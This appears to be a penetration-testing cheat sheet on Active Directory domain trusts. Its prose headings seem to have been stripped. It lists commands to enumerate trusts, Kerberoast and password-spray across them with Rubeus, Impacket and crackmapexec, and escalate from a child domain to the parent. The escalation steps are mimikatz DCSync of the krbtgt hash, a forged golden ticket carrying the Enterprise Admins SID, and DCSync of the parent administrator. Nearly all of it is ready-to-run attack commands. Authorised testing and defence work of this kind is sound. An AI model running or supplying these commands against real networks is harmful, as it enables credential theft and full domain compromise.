Import-Module activedirectory
Get-ADTrust -Filter *
# Current domain trusts
Get-DomainTrust
# Full trust mapping across all reachable domains
Get-DomainTrustMapping
netdom query /domain:<DOMAIN> trust
netdom query /domain:<DOMAIN> dc
netdom query /domain:<DOMAIN> workstation
Use pre-built query: Map Domain Trusts
| Property | Meaning |
|---|
Direction | Bidirectional or one-way |
IntraForest | True = parent-child within same forest |
ForestTransitive | True = forest trust |
TrustAttributes | WITHIN_FOREST, FOREST_TRANSITIVE |
SIDFilteringQuarantined | Whether SID filtering is active |
TGTDelegation | Whether TGT delegation is allowed |
# Users in a trusted domain
Get-DomainUser -Domain <TRUSTED_DOMAIN> | select SamAccountName
# Groups in a trusted domain
Get-DomainGroup -Domain <TRUSTED_DOMAIN> | select SamAccountName
# SPNs in a trusted domain (for Kerberoasting)
Get-DomainUser -SPN -Domain <TRUSTED_DOMAIN> | select SamAccountName,serviceprincipalname
# Domain Admins in a trusted domain
Get-DomainGroupMember -Identity "Domain Admins" -Domain <TRUSTED_DOMAIN>
# Windows (Rubeus)
.\Rubeus.exe kerberoast /domain:<TRUSTED_DOMAIN> /nowrap
# Linux (Impacket)
GetUserSPNs.py -dc-ip <TRUSTED_DC_IP> <TRUSTED_DOMAIN>/<USER>:<PASS> -request
crackmapexec smb <TRUSTED_DC_IP> -u users.txt -p '<PASSWORD>' -d <TRUSTED_DOMAIN>
| Type | Direction | Transitive | SID Filtering |
|---|
| Parent-child | Bidirectional | Yes | No |
| Cross-link | Bidirectional | Yes | No |
| Tree-root | Bidirectional | Yes | No |
| Forest | Varies | Yes | Yes (by default) |
| External | Varies | No | Yes |
# 1. KRBTGT hash from child domain
mimikatz # lsadump::dcsync /user:CHILDDOM\krbtgt
# 2. Child domain SID
Get-DomainSID
# 3. Enterprise Admins SID from parent domain
Get-DomainGroup -Domain <PARENT_DOMAIN> -Identity "Enterprise Admins" | select objectsid
# Or: Get-ADGroup -Identity "Enterprise Admins" -Server "<PARENT_DOMAIN>"
mimikatz # kerberos::golden /user:hacker /domain:<CHILD_FQDN> /sid:<CHILD_SID> /krbtgt:<KRBTGT_HASH> /sids:<EA_SID> /ptt
.\Rubeus.exe golden /rc4:<KRBTGT_HASH> /domain:<CHILD_FQDN> /sid:<CHILD_SID> /sids:<EA_SID> /user:hacker /ptt
# Confirm ticket in memory
klist
# Access parent domain DC
ls \\<PARENT_DC_FQDN>\c$
# DCSync the parent domain
mimikatz # lsadump::dcsync /user:<PARENT>\administrator /domain:<PARENT_FQDN>
| Flag | Value |
|---|
/user | Any name (can be fake) |
/domain | Child domain FQDN |
/sid | Child domain SID |
/krbtgt or /rc4 | Child KRBTGT NT hash |
/sids | Enterprise Admins SID (<parent-SID>-519) |
/ptt | Inject ticket into current session |
- Enumerate all trusts with
Get-ADTrust or Get-DomainTrust
- Note direction, transitivity, and SID filtering status
- Map full trust topology with
Get-DomainTrustMapping
- Enumerate users, groups, and SPNs across each trusted domain
- Kerberoast / password spray across trusts
- Check if compromised accounts have admin rights in the target domain
- Visualize with BloodHound
- Document all trusts for the report (clients are often unaware)